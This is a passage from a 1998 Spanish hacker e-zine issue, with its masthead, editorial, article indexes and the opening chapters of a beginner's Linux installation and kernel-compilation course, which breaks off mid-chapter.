Copy Link
Add to Bookmark
Report
JJF Hackers Team Journal 6
…----------------------------ª
| ⁄------ø |
| |€€€€€€| |
| ⁄------¥€€⁄---Ÿ |
| ⁄------¥€€€€€€|€€¿-ø |
| |€€€€€€√-ø€€⁄-¥€€€€| |
| ¿-ø€€⁄-¡ø|€€|J|€€⁄-Ÿ |
| ⁄--ø|€€|€€¿Ÿ€€|J|€€| |
| |€€¿Ÿ€€|€€€€€€|F√--Ÿ |
| |€€€€€€√------¡-Ÿ |
| ¿------Ÿ |
| H A C K E R S T E A M |
| J O U R N A L |
Ã----------------------------π
| VOL. #2, N°6, 1998. |
»----------------------------º
"The most important design issue...
is the fact that Linux is supposed to be fun..."
Linus Torvalds.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
de la informacion aqui expuesta y tampoco tiene que estar
de acuerdo con lo que sus colaboradores opinen.
Tampoco esperamos que la gente use la informacion aqui expuesta
para hacer daño ya que tan solo es con fines didacticos.
Recomendado el uso del editor del MS-DOS.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#CURRENT MEMBERS :
- CONDE VAMPIRO - CODER H/P/V EDITOR
- MAC CRACK - CODER C WEBMASTER
- Mr ELEKTRO - H/P ADMIN
- SILENT MOTION - CODER H/P ADMIN
- JUMPKNOWN - CODER H/P/V/C
- TASSLEHOFF - CODER H CO-WEBMASTER
#WEB OFICIAL :
- http://www.angelfire.com/mi/JJFHackers
- http://jjfhackers.home.ml.org
- http://jjfhackers.hypermart.net
#E-MAIL OFICIAL :
- jjf_team@usa.net
#LLAVE PGP OFICIAL :
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia
mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
=Wu00
-----END PGP PUBLIC KEY BLOCK-----
#DISTRIBUIDORES OFICIALES DEL E-ZINE :
- http://wakanda.islatortuga.com
- http://underhack.islatortuga.com
- http://www.redestb.es/~cheroky-1
- http://members.xoom.com/baron_rojo/
- http://members.xoom.com/rifoxxx
- http://www.geocities.com/Colosseum/Sideline/9497/
#MIEMBRO OFICIAL (web ring) DE :
- Black Angels
- Spanish Underground Web Ring
#COLABORADORES CON ESTE NUMERO :
- LeTaL
- CORE SDI S.A.
- \Wend|g0
- ZeD (HaCk`S-wEb-RiNg)
#SALUDOS :
- Metalslug (Wakanda) - NeonSurge (Rhino9)
- Schoddy Guy (Underhack) - L0pth
- Cheroky - Ivan Arce (CORE SDI S.A.)
- Silicon Dragon - Proyecto R
- Paseante (SET)
- Dr Slump (oioio)
<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->
- INDICE.
TITULO AUTOR
------------\_______________________________/------------
* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* INDICE DEL VOLUME N°1 .................... J.J.F. / HACKERS TEAM
* CURSO LINUX .............................. LETAL.
* HACK BASICO .............................. \WEND|G0.
* CURSO DE HACK VI ......................... CONDE VAMPIRO.
* CLONANDO MOVILES DEL CCC ................. J.J.F. / HACKERS TEAM
* ®QUE SE PUEDE HACER EN EL IRC? ........... ZED.
* PHREACKING PARA NOVATOS .................. ZED.
* COMO TRUCAR EL G¸INDOWS95 ................ ZED.
* ADVERTENCIA DE SEGURIDAD ................. CORE SDI S.A.
* EL LECTOR OPINA .......................... VARIOS.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
-------------
| EDITORIAL |
-------------
Pues quien lo diria, que este ezine comienza su segundo volumen y
por supuesto nos anima a seguir mejorando no solo el ezine, si no tambien
el web y muchas mas cosas que ya os iremos contando, que a lo largo de
este año seran muchas. Destacar que empezamos el segundo volumen con muy
buena calidad. Una de las cosas a destacar es la bienvenida de nuevos
miembros en J.J.F. / HACKERS TEAM, que son los siguientes : Mr. Elektro,
Silent Motion, JumpKnown y Tasslehoff.
Una pequeña reseña, ya que tenemos mas distribuidores oficiales, en el
cual podreis encontrar este ezine y tambien otros, los url's son los
siguientes: http://members.xoom.com/rifoxxx y
http://www.geocities.com/Colosseum/Sideline/9497/
Bueno, ya se acabo el verano, para algunos mal y para otros bien,
como siempre ahi toda clase de opiniones. Desde aqui quiero hacer una
pequeña reseña, ® me pregunto donde esta toda esa gente que decia que
quiere colaborar con articulos. ? Ya que todavia no hemos visto nada de
nada, a ver si para futuros numeros vemos vuestros nicks por aqui :)
Como ya hemos dicho muchas veces puedes escribir sobre H/C/P/V, seguridad
o de cualquier cosa que creas interesante. Por supuesto tambien nos
gustaria los puntos de vista de los administradores, agentes de la autoridad
y de las grandes corporaciones. Este es un ezine para todos los gustos.
Y POR FAVOR!!!!!!!! Si quieres escribir no envies un mail antes dicendo:
"Hola, os interesa un articulo de ...", lo que tienes que hacer es
ESCRIBIRLO y DESPUES NOS LO ENVIAS, asi de simple, okis!!!!
Por una vez en la vida sabemos cuando saldra el numero 7 :), por
eso avisamos de antemano para que envieis vuestros articulos. El numero 7
esta fijado para principios de diciembre, por lo que teneis tiempo de
sobra. ® Porque a principios de diciembre ?, la respuesta en el numero 7 :)
Hemos visto que en muchos sitios, tanto en web's como en articulos,
la gente no nos nombra correctamente y eso ahi que corregirlo, por lo que
hacemos hincapie en que para referiros al grupo lo hagais de la siguiente
manera : J.J.F. / HACKERS TEAM, y para referiros al ezine, pues de esta
otra: J.J.F. / HACKERS TEAM JOURNAL. Que son las formas correctas :)
En este numero hemos sufrido un pequeño retraso debido a varios
factores :) tambien decir que ayer fue el cumple de Conde Vampiro (21/9)
y el jueves es el de Tasslehoff (24/9) por lo que este semana estamos
de fiesta :))) Dentro de una semana, podreis encontrar en nuestro website
varias fotos de nuestras aventuras nocturnas que seguro que os encantaran,
por otro lado, AVISO A LOS DISTRUIBUIDORES OFICIALES: decir que hemos
puesto 2 logos que cualquiera que distribuya nuestro ezine le rogamos
que ponga en su website y ademas nos envie su url para ponerlo en el
ezine.
Desde aqui, - J.J.F. / HACKERS TEAM -, mandamos un apoyo a SET por los
problemas sufridos, referente a unos logs de un determinado kanal de IRC
de la red Hispanos y que sigan tirando para adelante :)
Desde aqui damos las gracias al señor Ivan Arce, por dejanos
publicar los avisos de la empresa CORE, al igual que tambien queremos
anunciaros, para los que no lo sepan, la mejor lista de seguridad en
castellano que se puede encontrar, la cual el señor Arce es el moderador y
para suscribirse haced lo siguiente, enviar mail a majordomo@secnet.com
con el texto "subscribe seg-l [su-email]" en el cuerpo del mensaje y ya
estareis suscritos.
Tambien damos las gracias a los señores Sergi Bueno y Javier Pedreira
"Wicho" de las revistas EN LA RED e IWORLD, respectivamente, por dejarnos
expresar nuestras opiniones y poder colaborar. Durante este año hemos
salido en las siguientes revistas :
- EN LA RED, 2.03.
- IWORLD, Año II, Numero 7. Julio-Agosto 1998.
- Jumping, Año IV, 2 Epoca, N¶20, Julio-Agosto 1998.
A todos ellos en gran o menor medida gracias.
- J.J.F. / HACKERS TEAM -
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
€Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ€
| ∫
∫ INDICE DEL VOLUME N°1 |
| ∫
∫ - J.J.F. / HACKERS TEAM JOURNAL - |
| ∫
€-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-Õ-€
Pues aqui os recordamos los articulos que han pasado por el Primer
Volumen del - J.J.F. / HACKERS TEAM JOURNAL -. A la vez que tambien damos
las gracias a todas aquellas personas que han hecho posible este ezine.
-> N°1
TITULO AUTOR
------------________________________________---------------
* EDITORIAL ________________________________ J.J.F. / HACKERS TEAM
* TECNICAS HACKER __________________________ VANDALS.
* CURSO DE HACK I __________________________ CONDE VAMPIRO.
* STACK OVERFLOW EXPLOiTS __________________ IPgh0st.
* CONFERENCIA DE LA GC EN EL SIMO __________ NOBODY.
* TEST HACKER ______________________________ MAC CRACK BISHOP.
* NOTICIAS UNDERGROUND _____________________ CONDE VAMPIRO.
-> N°2
TITULO AUTOR
------------\_______________________________/------------
* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* IP-SPOOFING DEMISTIFICADO ................ IPgh0st.
* LAND ATTACK .............................. NOBODY.
* CURSO DE HACK II ......................... CONDE VAMPIRO.
* MOVIL DEFECTUOSO ERICSSON GA-628 ......... JSR.
* INTRODUCCION AL HACK ..................... VIRUX.
* HACKERS HALL OF FAME ..................... BISHO.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-> N°3
TITULO AUTOR
------------\_______________________________/------------
* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* MIEDO A LOS ARTICULOS: NO, GRACIAS ....... CONDE VAMPIRO.
* QUE ES UN HACKER Y QUE ES UN CRACKER ..... BISHO.
* LOS OUTDIALS EN INTERNET ................. NOBODY.
* UN LOG DE UN SERVIDOR .................... ANONIMO.
* CURSO DE HACK III ........................ CONDE VAMPIRO.
* USO DE SAMBA EN LINUX/UNIX COMO
SUSTITUTO DEL NBTSTAT .................... ENIF.
* ESTADISTICA DE LOS HACKERS EN 1997 ....... J.J.F. / HACKERS TEAM
* DOCUMENTO SOBRE LOS PERMISOS DE ARCHIVOS
Y DIRECTORIOS PARA SISTEMAS UNIX ......... KOJI.
* INTRODUCCION AL HACKING v2.0 I ........... DAEMON.
* EL LECTOR OPINA .......................... VARIOS.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-> N°4
TITULO AUTOR
------------\_______________________________/------------
* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* HACK WITH JAVA ........................... NOBODY.
* UN POKILLO DE PHREAKING .................. DRSLUMP.
* CURSO DE HACK IV ......................... CONDE VAMPIRO.
* COMO HACKEAR UN TAMATGOTCHI .............. BISHO.
* MANIFIESTO DE UN HACKER NOVATO ........... SILICON DRAGON.
* INTRODUCCION AL HACKING v2.0 II .......... DAEMON.
* EL LECTOR OPINA .......................... VARIOS.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-> N°5
TITULO AUTOR
------------\_______________________________/------------
* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* HACK RSH (RESTRICTED SHELL) .............. NOBODY.
* HERRAMIENTAS PARA USUARIOS DE LINUX
(PARANOICOS?) ............................ CUBIKICE.
* CURSO DE HACK V .......................... CONDE VAMPIRO.
* COMO CRACKEAR NORTON CRASHGUARD
DELUXE 3.0 ............................... ESTADO PORCINO.
* UN POCO DE CULTURA: LIBROS ............... MAC CRACK
* EL LECTOR OPINA .......................... VARIOS.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
Y ahora un saludo a las siguientes personas que de alguna forma han
participado con - J.J.F. / HACKERS TEAM -.
-> Saludos :
- VANDALS
- IPgh0st (Underhack)
- NOBODY
- Virux (@pOkalypSYS)
- Bisho
- Jsr
- Metalslug (Wakanda)
- Koji
- Cesar
- Enif (Oioio)
- Daemon
- Schoddy Guy (Underhack)
- DrSlump (OiOiO's Band)
- Silicon Dragon
- Cheroky
- CubikIce
- Estado Porcino (WKT)
- Paseante (SET)
- Profesor Falken (SET)
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
---------------
-< CURSO LINUX >-
---------------
INDICE TEMATICO
---------------
#CAPITULO I: INTRODUCCION.
Linux, la mejor alternativa, caracteristicas.
#CAPITULO II : INSTALACION.
Requerimientos para la instalacion, Preparacion, Instalacion.
#CAPITULO III: KERNEL
®Que es el Kernel, ®Para que recompilarlo?, ®Que se necesita?,
Configuracion, Makefile, Compilacion, Instalacion.
#CAPITULO IV: USO
Conceptos basicos preliminares, Shells, Directorios, comandos basicos.
#CAPITULO V: TAREAS Y PROCESOS
Control de Tareas, Tareas y procesos, Primer plano y Segundo plano,
Envio a segundo plano y eliminacion procesos, Detencion o parada y
relanzamiento de tareas.
#CAPITULO VI: USUARIOS Administracion de Usuarios. Como agregar un usuario,
Como borrar un usuario.
#CAPITULO VII: SEGURIDAD BASICA
Permisos de Ficheros, Conceptos de permisos de ficheros, Interpretando los
permisos de ficheros, Dependencias, Cambiando permisos, Grupos,
#GLOSARIO.
#Capitulo I
Linux, la mejor alternativa.
Vamos a hablar un poco acerca de Sistemas Operativos. Mucho Usuarios
especialmente los novatos creen que el mundo esta hecho solo de Windows 95
y que el DOS fue su antepasado antediluviano, en realidad Windows 95 es una
nueva cara bonita del DOS. Pero la realidad nos dice que no existe un solo
S.O. tenemos varias decenas de ellos, por ejemplo antes de DOS fue CPM del
que heredamos entre otras cosas los archivos .COM, tambiÇn existen SPARC,
OS400, PICK, SYSTEM, OASIS, y una gran variedad de derivados de UNIX, entre
ellos SOLARIS, AIX, XENIX, USB, SUN OS y LINUX.
La aparicion de W95 a creado adeptos y adversos, pero tambien a dado
origen a un debate acerca de los sistemas operativos que creo le hace
mucho bien a la informatica.
Para contribuir con este debate imaginemonos el Sistema Operativo
ideal. Seguramente no todos estaremos de acuerdo en todas las sus
caracteristicas pero busquemos por lo menos diez puntos en comun.
1. CODIGO: Si nuestra PC actualmente tiene un microprocesador de 32
bits, el Sistema deber ser "completamente" de 32 bits. Es mas si en el
futuro tenemos PCs con procesadores de 64 bits, tambien el S.O. deber
estar compilado en 64 bits. Mas aun, seria mejor que el sistema operativo
se provea con sus fuentes en el lenguaje mas portable de cuantos existen
asi lo podemos compilar en la maquina que se nos antoje.
2. RED: Actualmente se impone cada vez con mayor firmeza el uso de
redes ya sean locales, Intranets e Internet. De manera que nuestro sistema
operativo deber estar concebido como de red desde sus origenes. Existen
muchos sistemas de red, debemos entonces pensar cual es la mejor opcion
teniendo en cuanta varios factores, la popularidad, la trayectoria, la
compatibilidad, la fiabilidad, etc. Tenemos que tener en cuenta tambien
cual es la escala mundial el estandar en Internet. La respuesta es una
sola, UNIX. Asi que nuestro S.O. deber estar basado en UNIX.
3. INTEFRCACE CON EL USUARIO: Con la aparicion de las MAC, se impuso
un nuevo estandar que luego fue incorporado por casi todos los S.O. Las
Interfaces Graficas. De manera que nuestro S.O. tiene que tener una. Es mas
seria mejor que tenga muchas y que el usuario pueda elegir si quiere que
esta se vea y comporte como Win95, como Solaris, como las no tan populares
NEXT, una propia de UNIX como ser MOTIFF, o de muchas otras formas algunas
totalmente ineditas y originales.
4. MULTITAREA: El cerebro del hombre es multitarea por naturaleza,
asi que la principal extension artificial del mismo (la PC) deber tener un
sistema operativo multitarea. Pero multitarea real, de tipo cooperativo,
que garantice la posibilidad de ejecucion de todas las aplicaciones
activas.
5. MULTIUSUARIO: La PC no es como un cepillo de dientes de uso
personal exclusivamente es mas bien como una esponja o cepillo de baño que
los usan toda la familia de manera que nuestro S.O. ideal deber tener
capacidad de administrar en forma segura la informacion y aplicaciones de
cada uno de sus usuarios pudiendo estos tener terminales propias o bien
usar una sola maquina.
6. MULTIMEDIA: Nuestro S.O. tendra que soportar todas las
capacidades multimedia actuales y las que vendran deberan tener una rapida
asimilacion.
7. APLICACIONES: Sin una fuerte biblioteca de aplicaciones un S.O.
esta destinado a perecer. De manera que tendremos que contar con una
amplisima coleccion de aplicaciones que cubran todos los rubros tales como
Graficos, Animaciones, Musica, Autoedicion, Procesamiento de textos,
Gestion administrativa y comercial. No nos olvidemos que como el S.O. de
suministra con sus fuentes es logico que las aplicaciones tambien lo hagan.
Como nos basamos en UNIX podremos aprovechar todo el software desarrollado
para esa plataforma.
8. OTRAS PLATAFORMAS: Las aplicaciones de otras plataformas tales
como DOS, Windows o Mac, tienen que correr con emuladores.
9. DESARROLLO: Es importante que nuestro S.O. tenga un amplio surtido
de compiladores y librerias, tales como C, C++, PASCAL, BASIC, SMALLTALK,
EIFFEL, CLIPPER, PERL, FORTRAM, ADA, MODULA 2, ETC.
10. Y como si todo esto fuera poco pidamos que este soportado por un
cuerpo de diseñadores y programadores expertos de todo el mundo.
11. Una de yapa. Que todo absolutamente todo sea GRATIS.
®Que tal? No parece un sueño llegar a contar algun dia con un S.O.
como este. Pero este sueño no es mio, esta quimera le pertenece a un
finlandes llamado Linus Torvalds y fue precisamente el quien dio los
primero pasos para hacerlo realidad y asi nace LINUX un S.O. con
mayusculas que no tiene nada que envidiarle a nadie. Actualmente en
cualquier casa de venta de Shareware se los puede conseguir al precio que
solo cubre los gastos de distribucion, por ejemplo tenemos paquetes que
cuentan con Cuatro o Cinco Distribuciones distintas ademas una completa
recopilacion de aplicaciones compiladores y librerias a menos de $30 en 6 o
mas CDs. Tambien esta disponible en Internet en todas sus distribuciones.
Son de recomendar las paginas WWW.LINUX.ORG, WWW.SUNSITE.UNC.EDU.
Caracteristicas de Linux
* Multitarea real: La multitarea es una virtud codiciada por muchos
SS.OO. pero lograda por muy pocos, casi todos los SS.OO. que dicen ser
multitarea lo son a medias ya que usan el concepto de Multitarea
Cooperativa que cede el microprocesador a otros procesos (aplicaciones)
solo cuando la aplicacion que se encuentra en primer plano cede el tiempo
de ejecucion y recursos, en cambio la multitarea preferente que usa Linux
administra los recursos garantizados que todos los procesos en ejecucion
incluidos los que corren en background tengan su tiempo de procesador.
* Multiusuario: Dado que como ya vimos Linux es un S.O. multitarea
es de esperar que tambien sea Multiusuario, es decir que permita que
personas distintas puedan acceder a su potencial compartiendo los recursos
que el Administrador del Sistema (SysOp, root) le asigne de acuerdo a su
jerarquia, dandole ademas a cada uno la privacidad y proteccion necesaria.
Cada usuario tendra asignado un espacio de disco, aplicaciones, Shells,
impresoras, etc. lo que junto a la ID (nombre con que el usuario se
registra) y el password (palabra clave) se denomina Cuentas de Usuarios, en
el momento en que un usuario desde una terminal remota entra en el sistema
(login) se dice que comienza una sesion es decir que el micro le garantiza
recursos y tiempo de microprocesador.
* G.N.U.: Si bien Linus Torvalds es el titular del derecho de autor
de LINUX, todo, incluido el kernel con sus fuentes estan bajo licencia GNU.
Esta licencia permite que todos el software desarrollado bajo este concepto
sea de libre distribucion ofreciendo asi al publico en general software de
calidad sin que los programadores pierdan sus derechos de autor dejando
abierta la posibilidad que cualquier otro programador pueda ampliar o
modificar el programa.
* Librerias Compartidas: Gracias a esta caracteristicas no es
necesario que las rutinas contenidas en librerias estandar se carguen mas
de una ves en memoria, ya que cualquier programa que se encuentre en tiempo
de ejecucion puede acceder a ellas, de esta manera los binarios
(ejecutables) de Linux son de menor tamaño permitiendo ahorrar espacio en
disco y memoria.
* Carga por Demanda: En la mayoria de los SS.OO. Cada nuevo proceso
(aplicaci¢n) que se lanza demanda memoria y recursos, pero cuando se
termina la RAM automaticamente se comienza a hacer uso de la memoria
virtual, esto no ocurre en Linux puesto que su administracion inteligente
de memoria pasa a memoria virtual cualquier proceso que se encuentre activo
pero no en uso garantizando de esta manera RAM para la aplicaciones activas
y en uso.
* Administracion de Memoria: Todos los procesos tienen garantizada
una zona protegida de memoria para su ejecucion, sin que el mal
funcionamiento de una aplicacion cuelgue a todo el equipo.
* Redes TCP/IP: Para conectarse a Internet por ejemplo en Windows
necesitamos instalar el protocolo TCP/IP. Esto no ocurre en Linux ya que al
ser TCP un protocolo propio de los sistemas UNIX luego heredado por Linux
contamos directamente con el en el kernel, incluso la aparici¢n de Java no
paso inadvertida para Linux de manera que fue inmediatamente absorbida y ya
se cuenta con soporte tanto para JavaScripts como para applets Java los
cuales se pueden ejecutar como software nativo al estar incluido en el
Kernel.
* Aplicaciones: Gracias a la licencia GNU el caudal de aplicaciones
disponibles para Linux crece a un ritmo vertiginoso especialmente en
Internet. Podemos decir que existe software para practicamente todas las
necesidades. La unica limitacion para los usuarios de habla hispana es el
idioma ya que es muy dificil encontrar software traducido o de origen
latino para Linux.
* Desarrollo: Linux es un S.O. echo y pensado por programadores para
programadores, a partir de esto podemos encontrar compiladores o
interpretes para todos los lenguajes existentes. Algunos ejemplos son los
siguientes: C (propio de los sistemas UNIX), C++, ADA, PASCAL, PERL,
MODULA 2, FORTRAN, PHYTON, EIFFEL, BASIC, RPG, SMALLTALK, COBOL, ASSEMBLER,
OBERON, ETC.
#Capitulo II
Requerimientos de hardware para la instalacion
* CPU: Su computadora debe tener un procesador 386, 486, Pentium, o
Pentium Pro, o uno de los clones de estos procesadores hechos por
fabricantes como Cyrix, AMD, TI, IBM, etc. Si su procesador tiene letras
como "sx", "sl", "slc", etc. despues del numero, como en "386sx", es
correcto. El sistema no funcionar en un 286 o en procesadores inferiores.
* Bus de E/S: Su computadora debe utilizar el bus ISA, EISA, PCI, o
VL. El bus VL se conoce tambien como VESA Local Bus o VLB. Las computadoras
que tienen PCI o VLB generalmente tienen tambien ranuras ISA o EISA.
* RAM y Disco Rigido: Debe tener al menos 4MB de RAM aunque es
recomendable no menos de 16MB y 40MB de disco duro, pero si usted quiere
instalarlo todo necesitar 300MB o mas. Las interfaces de disco que emulan
la interfaz de disco "AT" que se llaman habitualmente MFM, RLL, IDE, o ATA
estan soportados. Las controladoras de disco SCSI de diversos fabricantes
estan soportadas.
* Unidad de disquete: Debe tener una unidad de disquete de 1.2MB o
1.44MB como unidad a: en el sistema en el que instale Linux. Si tiene tanto
una unidad de 1.2MB como una de 1.44MB, configure el hardware para que la
unidad de 1.44MB sea la a:.
* MPC: Como casi todas las distribuciones de Linux vienen en CD-ROM
necesitaremos una lectora que puede ser IDE, SCSI o con norma propia como
alguna Creative o Mitusmi.
* Placa de video: Aunque soporta desde una hercules, es recomendable
usar una placa de video compatible con VGA para el terminal de la consola.
Practicamente cualquier tarjeta grafica moderna es compatible con VGA. CGA,
MDA, o HGA pueden funcionar correctamente para texto, pero no funcionar
con el Xwindows.
* Otro Hardware: Linux soporta una gran variedad de dispositivos como
son: ratones, impresoras, escaners, modems, tarjetas de red, etc. Sin
embargo, no se requiere ninguno de estos dispositivos durante la
instalacion del sistema.
Preparacion:
Antes de comenzar, asegurese de que realiza una copia de seguridad de
todos los ficheros que hay en su sistema.
Informacion que necesitar :
* Norma del CD-ROM
* Norma del HD
* Especificaciones de su placa de RED (Modelo, Puerto E/S, IRQ)
* Especificaciones de su raton, modem, teclado, zona horaria.
* Frecuencia de barrido horizontal y vertical de su monitor, marca, modelo,
chipset, RAM y clocks de su placa de video.
* Tipo de servidor grafico segun su placa de video.
* El nombre de la maquina (posiblemente pueda decidir esto por su cuenta).
* El nombre del dominio.
* La direccion IP de su computadora.
* La mascara de red (netmask) que ha de usarse con su red.
* La direccion IP de su red.
* La direccion de difusion (broadcast) que ha de usar en su red.
* La direccion IP de la pasarela (gateway) del sistema por omision hacia la
cual hay que encaminarse, si su red tiene una pasarela.
* El sistema de su red que debe usar como servidor DNS (`Domain Name
Server', servidor de nombres de dominio).
Antes de proceder a la instalacion en si, debemos realizar una serie
de preparativos en nuestro equipo
Preparacion del HD. Si no ha particionado aun su rigido para Linux y
memoria virtual deber recurrir a la aplicacion shareware FIPS que
encontrara en cualquier distribucion de Linux, pero antes de usarla
asegurese de que desfragmento su HD. FIPS le permitir ahora particionar su
rigido sin que pierda la informacion contenida. Dejaremos de esta manera
suficientes megas libres de su HD para luego cuando la instalacion lo
requiera creemos las nuevas particiones con "fdisk", al menos una particion
Nativa Linux y una particion de intercambio para Linux, la particion de
intercambio se utilizar para suministrar memoria virtual al sistema, y debe
tener un tamaño entre 16 y 128 megabytes, dependiendo de cuanto espacio de
disco tenga usted y cuantos programas grandes quiera ejecutar. Linux no
usar mas de 128 megabytes de intercambio, asi que no hay razon para hacer
su particion de intercambio mayor que eso. Se recomienda el uso de una
particion de intercambio sea cual fuere su RAM, y si su sistema tiene mas
de 16 megabytes de RAM lo recomendable para un uso promedio del sistema es
usar la mitad de RAM real como memoria de intercambio. La particion "Linux"
contendra todos sus ficheros, y puede hacerla de cualquier tamaño entre 40
megabytes y el tamaño maximo del disco, menos el tamaño de la particion de
intercambio. Si usted esta familiarizado con Unix o Linux, puede querer
crear particiones adicionales, por ejemplo, puede crear particiones que
contendran los sistemas de ficheros /var, y /usr.
Si ya tenemos listo el Disco Rigido y la informacion necesaria
podemos proceder a la instalacion para ello necesitaremos que la PC
encendida con DOS y con acceso al CD-ROM con el CD de Red Hat colocado.
1. Ingresar al directorio DOSUTILS
2. Ejecutar DOSBOOT.BAT el que se encarga de llamar a "LOADLIN.EXE" que es
un programa DOS que carga una imagen del Kernel en RAM borrando todo
vestigio del DOS.
3. Luego del Booteo, Linux entra automaticamente en una aplicacion que no
es otra cosa que un asistente para la instalacion. A el deberemos
contestar las preguntas que nos vaya haciendo de acuerdo a la
informacion que recopilamos.
4. Tambien el asistente se encargara de preguntar acerca del nuestro HD
dandonos la posibilidad de ejecutar "fdisk" a fin de particionar nuestro
rigido, el uso de fdisk es sencillo a pesar de ser mucho mas poderoso
que el de DOS y Windows basta decir que con "m" accedemos a la ayuda del
mismo, lo que hora debemos hacer es: a) crear la particion SWAP con por
lo menos la mitad de la RAM real, para ello usaremos la opcion "n" y
luego de decirle el numero de particion le indicaremos el tipo que deber
ser primaria, con "t" le cambiamos el tipo a "82" que es SWAP, b) crear
la particion Linux Nativa con "n" nuevamente que tambien deber ser
primaria el tipo no es necesario cambiarlo por cuanto por defecto crea
particiones Linux Nativa (tipo 83).
5. Seleccionar los paquetes que instalaremos, esta es una lista muy
extensa, son imprescindibles los paquetes base, C, C++, X11, Network,
pero son necesarios casi todos si lo que pretendemos es un servidor de
RED, lo superfluo son lo juegos y algunas aplicaciones muy especificas
como el diseño de circuitos y microprocesadores. Es recomendable
instalar el Midnight Commander que es un clon de Norton Comander para
Linux el que se encuentra en el paquete de Shells y el "joe" que es un
editor de texto similar a WordStar y los IDE de Borland.
6. Ahora el asistente nos ayudara a instalar "lilo" que es el sistema de
arranque dual de Linus el que nos permitir la posibilidad de arrancar
con mas de un S.O.
7. Si todo salio bien ya hemos terminado con la instalacion Red Hat. Si no
es asi aqui comienza nuestro penar y lo que les puedo recomendar es
armarse de paciencia y resarle a nuestro santo favorito que encontremos
las solucion.
#Capitulo III
KERNEL
®Que es el Kernel?
El kernel de UNIX actua como intermediario entre los programas, el
ordenador y el usuario. En primer lugar, gestiona la memoria de todos los
programas o procesos, y asegura que se asignen ciclos del microprocesador a
cada uno. Ademas, proporciona una interfaz portable para que los programas
hablen facilmente con su hardware.
®Para que recompilar el kernel?
Las nuevas versiones normalmente ofrecen la posibilidad de entenderse
con mas accesorios hardware (o sea, incluyen mas drivers), se ejecutan mas
rapidamente, son mas estables o corrigen errores de otras versiones. Ademas
la recompilacion nos permitir adecuar el nucleo a el hardware que tenemos
pudiendo de esta manera acceder por ejemplo a placas de sonido, video, etc.
Otra de las ventajas es que podemos seleccionar que sistemas de archivos
vamos a necesitar por ejemplo en mi caso unicamente accedo a sistemas Vfat
de W95, MS-DOS, ISO9660, Minix y Ext2fs, de manera que no ocupo
innecesariamente recursos al incluir sistemas de archivos por ejemplo para
OS/2 o Coherent.
®Que necesito para recompilar el Kernel?
Necesitaremos:
1. Las fuentes del Kernel que se proveen con cualquier distribucion de
Linux, tambien los podemos actualizar de Internet para poder contar con
la ultima version. Aproximadamente los fuentes comprimidos con gzip
ocupan 8MB y una vez descomprimido en el disco usan cerca de 30MB.
2. El compilador de C "gcc" incluido en el paquete de "Development"
3. Las librerias "libc".
Archivos y directorios.
Entre en la cuenta root y vaya al directorio /usr/src. Si instalo las
fuentes en la instalacion de Linux, habra aqui un directorio linux, con las
fuentes antiguas. Si quiere preservar esas fuentes (y tiene espacio de
sobra), renombre (con mv) ese directorio a linux-x.y.z. Es importante que
antes de descomprimir las nuevas fuentes no haya ningun directorio
/usr/src/linux.
Ahora, en /usr/src, descomprima las fuentes con
tar xvfzp linux-x.y.z.tar.gz
(Si solo tiene un fichero .tar, sin .gz, elimine la z del comando
tar). Los contenidos del fichero se expandir n en /usr/src/linux. Vaya
ahora a ese directorio y lea el fichero README.
Configuracion del Kernel
Antes de recompilar debemos configurar que caracteristicas tendra
nuestro nuevo kernel para ello primero limpiaremos de anteriores
configuraciones el disco con:
make mrproper
luego comenzaremos con la configuracion en si con:
make config
invocado en el directorio /usr/src/linux inicia un programa shell-
script de configuracion que le preguntar bastantes cosas. Requiere que este
instalado bash, con lo que debe existir /bin/bash, /bin/sh o la variable
$BASH.
